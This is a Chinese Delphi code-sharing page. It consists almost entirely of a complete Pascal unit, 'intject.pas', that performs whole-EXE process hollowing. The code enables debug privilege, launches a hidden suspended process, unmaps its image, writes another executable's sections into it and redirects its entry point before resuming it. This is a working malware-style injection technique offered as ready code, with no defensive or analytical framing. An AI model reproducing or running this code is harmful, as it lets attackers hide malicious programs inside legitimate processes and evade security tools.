本文整理自网络,侵删。
EXE整体注入
intject.pas
unit intject;
interface
uses
Windows;
var
ZwUnmapViewOfSection:function(ProcessHandle:thandle; BaseAddress:Pointer):LongInt; stdcall;
CreateProcessX:function(lpApplicationName: PChar; lpCommandLine: PChar;
lpProcessAttributes, lpThreadAttributes: PSecurityAttributes;
bInheritHandles: BOOL; dwCreationFlags: DWORD; lpEnvironment: Pointer;
lpCurrentDirectory: PChar; const lpStartupInfo: TStartupInfo;
var lpProcessInformation: TProcessInformation): BOOL; stdcall;
//external 'ntdll.dll' name 'ZwUnmapViewOfSection';
type
PImageSectionHeaders = ^TImageSectionHeaders;
TImageSectionHeaders = Array [0..95] Of TImageSectionHeader;
procedure InJect(path,path1:string);
implementation
function ImageFirstSection(NTHeader: PImageNTHeaders): PImageSectionHeader;
Begin
Result := PImageSectionheader(Cardinal(@NTheader.OptionalHeader) +
NTHeader.FileHeader.SizeOfOptionalHeader);
End;
function Protect(Characteristics: ULONG): ULONG;
Const
Mapping :Array[0..7] Of ULONG = (
PAGE_NOACCESS,
PAGE_EXECUTE,
PAGE_READONLY,
PAGE_EXECUTE_READ,
PAGE_READWRITE,
PAGE_EXECUTE_READWRITE,
PAGE_READWRITE,
PAGE_EXECUTE_READWRITE);
Begin
Result := Mapping[ Characteristics SHR 29 ];
End;
procedure SetPrivilege;
var
currToken:THandle;
newState:TTokenPrivileges;
prevStateLen:DWORD;
Luid: TLargeInteger;
begin
if OpenProcessToken(GetCurrentProcess,TOKEN_ADJUST_PRIVILEGES,currToken) then //获得进程访问令牌的句柄
begin
if LookupPrivilegeValue(nil, 'SeDebugPrivilege',Luid) then
begin
newState.PrivilegeCount:=1;
newState.Privileges[0].Attributes:=2;
newState.Privileges[0].Luid:=Luid;
prevStateLen:=0;
AdjustTokenPrivileges(currToken, False, newState, sizeof(TTokenPrivileges),nil, prevStateLen);
end;
end;
end;
procedure InTo(Buffer: Pointer; ProcessName: String);
Var
ProcessInfo :TProcessInformation;
StartupInfo :TStartupInfo;
Context :TContext;
BaseAddress :Pointer;
BytesRead :DWORD;
BytesWritten :DWORD;
I :ULONG;
OldProtect :ULONG;
NTHeaders :PImageNTHeaders;
Sections :PImageSectionHeaders;
Kernel,ntdll:LongWord;
Begin
FillChar(ProcessInfo, SizeOf(TProcessInformation), 0);
fillChar(StartupInfo, SizeOf(TStartupInfo), 0);
StartupInfo.cb := SizeOf(TStartupInfo);
StartupInfo.wShowWindow := SW_HIDE;
{$IFDEF UNICODE}
Kernel:=LoadLibrary('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessW');
{$ELSE}
Kernel:=LoadLibraryW('kernel32.dll');
@CreateProcessX := GetProcAddress(Kernel,'CreateProcessA');
{$ENDIF}
ntdll:=LoadLibrary('ntdll.dll');
ZwUnmapViewOfSection:=GetProcAddress(ntdll,'ZwUnmapViewOfSection');
SetPrivilege;
CreateProcessX(nil,PChar(ProcessName), NIL, NIL, false, CREATE_SUSPENDED, NIL, NIL, StartupInfo, ProcessInfo);
FreeLibrary(Kernel);
Context.ContextFlags := CONTEXT_INTEGER;
GetThreadContext(ProcessInfo.hThread, Context);
ReadProcessMemory(ProcessInfo.hProcess, Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesRead);
ZwUnmapViewOfSection(ProcessInfo.hProcess, BaseAddress);
if not Assigned(Buffer) then exit;
NTHeaders:= PImageNTHeaders(Cardinal(Buffer) + Cardinal(PImageDosHeader(Buffer)._lfanew));
BaseAddress:= VirtualAllocEx(ProcessInfo.hProcess, Pointer(NTHeaders.OptionalHeader.ImageBase), NTHeaders.OptionalHeader.SizeOfImage,MEM_RESERVE or MEM_COMMIT,PAGE_READWRITE);
If not Assigned(BaseAddress) then exit;
WriteProcessMemory(ProcessInfo.hProcess, BaseAddress, Buffer, NTHeaders.OptionalHeader.SizeOfHeaders,BytesWritten);
Sections := PImageSectionHeaders(ImageFirstSection(NTHeaders));
For I := 0 To NTHeaders.FileHeader.NumberOfSections -1 Do
begin
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+Sections[I].VirtualAddress), Pointer(Cardinal(Buffer) + Sections[I].PointerToRawData), Sections[I].SizeOfRawData, BytesWritten);
VirtualProtectEx(ProcessInfo.hProcess,Pointer(Cardinal(BaseAddress)+ Sections[I].VirtualAddress),Sections[I].Misc.VirtualSize,
Protect(Sections[I].Characteristics),OldProtect);
end;
WriteProcessMemory(ProcessInfo.hProcess,Pointer(Context.Ebx + 8), @BaseAddress, SizeOf(BaseAddress), BytesWritten);
Context.Eax := ULONG(BaseAddress)+NTHeaders.OptionalHeader.AddressOfEntryPoint;
Context.SegGs:=0;
Context.SegFs:=$38;
Context.SegEs:=$20;
Context.SegDs:=$20;
Context.SegSs:=$20;
Context.SegCs:=$18;
Context.EFlags:=$3000;
FreeLibrary(ntdll);
if not SetThreadContext(ProcessInfo.hThread, Context) then
TerminateProcess(ProcessInfo.hProcess, 0)
Else resumeThread(ProcessInfo.hThread);
End;
procedure InJect(path,path1:string);
var
BytesRead, Module, Size: dword;
Data: pointer;
begin
Module := CreateFile(pchar(path), GENERIC_READ, FILE_SHARE_READ, nil, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, 0);
Size := GetFileSize(Module, nil);
GetMem(Data, size);
ReadFile(Module, Data^, size, BytesRead, nil);
InTo(data,path1);
CloseHandle(Module);
freemem(data);
end;
end.
相关阅读 >>
Delphi webbrowser 无法调用当前浏览器的版本
Delphi unigui中如何监听session的开始与结束
Delphi 打开win8及以上操作系统的系统已安装程序目录
更多相关阅读请进入《Delphi》频道 >>